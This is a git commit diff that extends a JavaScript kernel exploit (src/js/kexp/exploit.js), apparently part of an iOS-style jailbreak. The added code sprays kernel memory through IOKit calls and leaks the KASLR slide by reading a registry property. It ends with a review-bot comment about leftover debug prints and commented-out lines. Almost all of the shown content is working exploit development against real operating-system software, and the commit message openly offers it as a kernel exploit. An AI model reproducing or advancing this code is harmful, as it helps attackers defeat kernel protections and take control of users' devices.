| author | spv420 <unomilliono@gmail.com> | 2022-04-24 14:02:35 -0400 |
|---|---|---|
| committer | spv420 <unomilliono@gmail.com> | 2022-04-24 14:02:35 -0400 |
| commit | 3b49965546a678f46085e961f729b179c7542f89 (patch) | |
| tree | b205984efc8ec46b6054f90395e8cf5d58f54bc3 /src/js/kexp/exploit.js | |
| parent | 0b212a73e235c233b4addd0c9ea6b55676416d17 (diff) | |
ohai i heard you want kernel exploit
Diffstat (limited to 'src/js/kexp/exploit.js')
| -rw-r--r-- | src/js/kexp/exploit.js | 28 |
1 files changed, 27 insertions, 1 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index a78bdca..5296e6e 100644
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -20,6 +20,8 @@
 var KERN_SUCCESS = 0;
 var NULL = 0;
 var MACH_PORT_NULL = 0;
+var fakeportData = 0;
+
 var kOSSerializeDictionary = 0x01000000;
 var kOSSerializeArray = 0x02000000;
 var kOSSerializeSet = 0x03000000;
@@ -73,6 +75,7 @@ function spray_data(mem, size, num, portptr) {
 printf("%x %x\n", master, read_u32(master));
 printf("%x\n", read_u32(0x36ebf00c + get_dyld_shc_slide()));
 ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, __cnt * 4, MACH_PORT_NULL, NULL, 0, err, portptr);
+ printf("still alive?\n");
 if (ret == KERN_SUCCESS) {
 ret = read_u32(err);
 }
@@ -86,10 +89,11 @@ function copyinPort(kport, cnt) {
 var self = mach_task_self();
 var service = MACH_PORT_NULL;
 var client = malloc(4);
- var it = MACH_PORT_NULL;
+ var it = malloc(4);
 var o = MACH_PORT_NULL;
 var data = malloc(4);
 var master = malloc(4);
+ fakeportData = malloc(4);
 host_get_io_master(mach_host_self(), master);
 ret = spray_data(NULL, 0, 5, data);
 printf("spray_data=%d (%s)\n", ret, mach_error_string(ret));
@@ -112,6 +116,28 @@ function copyinPort(kport, cnt) {
 ret = read_u32(err);
 }
 printf("io_service_open_extended=%d (%s)\n", ret, mach_error_string(ret));
+ IORegistryEntryGetChildIterator(service, "IOService", it);
+
+ var found = false;
+
+ while ((o = IOIteratorNext(read_u32(it))) != MACH_PORT_NULL && !found) {
+ var buf = malloc(16 * 4);
+ var size = malloc(4);
+ write_u32(size, 16 * 4);
+ ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
+ if (ret == KERN_SUCCESS) {
+ printf("yolo\n");
+// mach_port_deallocate(self, read_u32(data));
+// write_u32(data, MACH_PORT_NULL);
+ spray_data(tst, strlen(tst) + 1, 10, fakeportData);
+ var kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
+ printf("still alive? %x\n", 420);
+ printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
+ sleep(1);
+ found = true;
+ }
+ }
+
 }
 function get_kernel_task() { |
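Review bot: The new loop body in copyinPort commits two commented-out statements (`// mach_port_deallocate(self, read_u32(data));` and `// write_u32(data, MACH_PORT_NULL);`) together with a leftover trace line `printf("still alive? %x\n", 420);` whose argument is a meaningless constant; commented-out code should be deleted rather than checked in, and the trace either removed or replaced by a message that says what state has been reached. The same applies to the `printf("still alive?\n");` added in the earlier spray_data hunk. The body of copyinPort begins before this hunk, so the surrounding declarations are not visible here.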
